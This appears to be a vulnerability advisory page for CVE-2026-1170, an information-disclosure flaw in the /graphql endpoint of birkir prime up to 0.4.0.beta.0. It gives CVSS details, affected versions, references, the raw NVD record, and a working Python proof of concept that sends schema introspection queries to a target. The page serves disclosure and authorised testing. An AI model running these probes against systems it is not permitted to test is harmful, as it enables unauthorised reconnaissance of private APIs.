Security Vulnerability Report
CVE-2026-1170 CVSS 5.3 MEDIUM

CVE-2026-1170

Published: 2026-01-19 18:16:05
Last Modified: 2026-02-23 09:16:49

Description

A vulnerability was detected in birkir prime up to 0.4.0.beta.0. This issue affects some unknown processing of the file /graphql of the component GraphQL API. Performing a manipulation results in information disclosure. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score
5.3 (CVSS v3.1 base). The raw record below also carries a CVSS v4.0 base score of 5.5 MEDIUM (vector includes E:P, i.e. a public proof of concept exists) and a CVSS v2.0 score of 5.0; all three agree on a network-reachable, unauthenticated issue with low confidentiality impact and no integrity or availability impact.
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:birkir:prime:*:*:*:*:*:*:*:* - VULNERABLE
birkir prime <= 0.4.0.beta.0 — the advisory says "up to 0.4.0.beta.0" and the NVD CPE match uses versionEndIncluding 0.4.0 with no lower bound, so 0.4.0.beta.0 itself and every earlier version are in scope. No fixed release is listed: per the description the maintainer had not responded to the issue report, so treat all published versions as affected until upstream states otherwise.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only: run it solely against systems you are explicitly permitted to test. Be clear about what it does and does not prove. The advisory only says that "some unknown processing" of /graphql discloses information; this script probes the most common cause on a GraphQL endpoint, schema introspection served to unauthenticated clients. A response containing schema data shows introspection is exposed; it does not by itself confirm the specific defect tracked as CVE-2026-1170 (compare with upstream issue birkir/prime#541 in the references).
python
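# CVE-2026-1170 PoC - birkir prime GraphQL Information Disclosure
# Target: birkir prime <= 0.4.0.beta.0 (NVD CPE match: versionEndIncluding 0.4.0)
# Endpoint: /graphql
#
# NOTE(review): the public advisory only says that "some unknown processing"
# of /graphql leaks information. This script probes the most common cause on a
# GraphQL endpoint - schema introspection answered without authentication -
# so a hit proves that introspection is exposed, not that the exact defect
# tracked as CVE-2026-1170 is present. Confirm against the upstream issue
# (birkir/prime#541) before reporting a finding as this CVE.
import json
import sys

__all__ = [
    "TARGET_URL",
    "INTROSPECTION_QUERIES",
    "build_payloads",
    "is_disclosure",
    "exploit_information_disclosure",
]

# Placeholder only; pass the real endpoint as argv[1] or as target_url.
TARGET_URL = "http://target.com/graphql"

# Probes, ordered from "is introspection enabled at all" to "what does it
# expose": full schema, one named type, then descriptions/deprecated fields.
INTROSPECTION_QUERIES = (
    # PoC 1: enumerate every type and its fields
    """
    {
      __schema {
        types { name fields { name type { name } } }
        queryType { name fields { name } }
      }
    }
    """,
    # PoC 2: ask for one type by name. If it does not exist the server
    # answers {"data": {"__type": null}} - see is_disclosure().
    """
    {
      __type(name: "User") {
        name
        fields { name type { name kind } }
      }
    }
    """,
    # PoC 3: descriptions and deprecated fields often carry internal notes
    """
    {
      __schema {
        types {
          name
          description
          fields(includeDeprecated: true) {
            name description isDeprecated deprecationReason
          }
        }
      }
    }
    """,
)


def build_payloads() -> list[dict[str, str]]:
    """Return the three probe bodies as GraphQL-over-HTTP JSON documents."""
    return [{"query": query} for query in INTROSPECTION_QUERIES]


def is_disclosure(data: object) -> bool:
    """Decide whether a decoded GraphQL response body exposed schema data.

    Returns True only when the body is a dict without an "errors" array whose
    "data" member is a dict holding at least one non-empty value. The original
    check, ``"errors" not in data and data.get("data")``, accepted
    ``{"data": {"__type": null}}`` - what a server returns for PoC 2 when no
    ``User`` type exists - because a dict with one null value is truthy, and
    so reported a false positive.
    """
    if not isinstance(data, dict) or "errors" in data:
        return False
    payload = data.get("data")
    if not isinstance(payload, dict):
        return False
    # None / {} / [] are all falsy; a populated __schema or __type object is not.
    return any(payload.values())


def exploit_information_disclosure(target_url: str = TARGET_URL) -> list[bool]:
    """Send each probe to *target_url* and report whether it looked like a leak.

    Args:
        target_url: full URL of the /graphql endpoint under authorized test.

    Returns:
        One bool per probe, in probe order: True when the response was HTTP
        200, parsed as JSON and satisfied is_disclosure(). Transport failures
        and non-JSON bodies are reported on stdout and count as False; they
        are never raised to the caller.
    """
    import requests  # third-party; imported here so the pure helpers above load without it

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-1170-PoC)",
    }
    print("[*] Testing CVE-2026-1170 - birkir prime GraphQL Info Disclosure")
    print(f"[*] Target: {target_url}")

    results: list[bool] = []
    for i, payload in enumerate(build_payloads(), 1):
        hit = False
        try:
            print(f"\n[*] Sending PoC payload {i}...")
            response = requests.post(target_url, json=payload, headers=headers, timeout=10)
            if response.status_code == 200:
                # .json() raises ValueError (requests' JSONDecodeError subclasses
                # it) on HTML error pages or WAF block pages served with a 200;
                # the original only caught RequestException and would crash here.
                data = response.json()
                if is_disclosure(data):
                    hit = True
                    print(f"[+] PoC {i} SUCCESS - Information disclosure detected!")
                    print(f"[+] Response preview: {json.dumps(data, indent=2)[:500]}...")
                else:
                    print(f"[-] PoC {i} - Response may contain errors or no data")
            else:
                print(f"[-] PoC {i} - HTTP {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[-] PoC {i} - Request failed: {e}")
        except ValueError as e:
            print(f"[-] PoC {i} - HTTP 200 but body is not JSON: {e}")
        results.append(hit)

    print("\n[*] PoC execution completed")
    print("[*] Recommendation: Disable GraphQL introspection in production")
    return results


if __name__ == "__main__":
    exploit_information_disclosure(sys.argv[1] if len(sys.argv) > 1 else TARGET_URL)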

References

- https://github.com/birkir/prime/ (project repository)
- https://github.com/birkir/prime/issues/541 (upstream issue; NVD tags: Exploit, Issue Tracking, Vendor Advisory)
- https://vuldb.com/?id.341764 (VulDB entry; Third Party Advisory)
- https://vuldb.com/?ctiid.341764 (VulDB CTI view; Permissions Required)
- https://vuldb.com/?submit.731100 (VulDB submission; Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1170", "sourceIdentifier": "[email protected]", "published": "2026-01-19T18:16:04.773", "lastModified": "2026-02-23T09:16:48.947", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in birkir prime up to 0.4.0.beta.0. This issue affects some unknown processing of the file /graphql of the component GraphQL API. Performing a manipulation results in information disclosure. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Se detectó una vulnerabilidad en birkir prime hasta 0.4.0.beta.0. Este problema afecta a algún procesamiento desconocido del archivo /graphql del componente GraphQL API. Realizar una manipulación resulta en revelación de información. El ataque puede iniciarse de forma remota. El exploit ahora es público y puede ser utilizado. El proyecto fue informado del problema con antelación a través de un informe de problema, pero aún no ha respondido."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": 
"NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:birkir:prime:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.4.0", "matchCriteriaId": "65419F9E-4813-4B36-BA74-1839A5525EFC"}]}]}], "references": [{"url": "https://github.com/birkir/prime/", "source": "[email protected]"}, {"url": "https://github.com/birkir/prime/issues/541", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.341764", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341764", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.731100", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}